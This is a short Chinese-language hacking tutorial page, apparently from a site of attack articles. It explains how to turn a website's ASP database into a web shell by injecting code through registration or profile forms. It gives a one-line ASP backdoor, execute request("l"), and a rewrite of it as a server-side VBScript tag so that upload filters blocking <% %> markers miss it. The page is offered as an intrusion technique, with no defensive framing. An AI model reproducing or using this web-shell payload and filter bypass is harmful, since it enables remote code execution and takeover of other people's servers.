很多时候我们可以通过在注册表单或者用户信息修改表单中插入简短ASP代码使网站WebSiteASP数据库变成为个ASP木马然后进步入侵控制服务器

　　不过在上传代码过程中许多网页都不允许包含〈%%〉标记符号内容文件上传

　　这样就有好多SHELL不能上传上去了可以采用下面思路方法解决以蓝屏最小ASP木马为例

　　首先:原代码是:

　　〈%execute request("l")%〉

　　我们可以把它标签换下来

　　然后改成:

　　〈scriptlanguage=VBScript runat=server〉execute request("l")〈/Script〉

　　这样就避开了使用〈%%〉保存为.ASP,同样执行

上篇文章: 网络攻击常用命令综述

下篇文章: 黑客隐藏PHP文件后门窍门技巧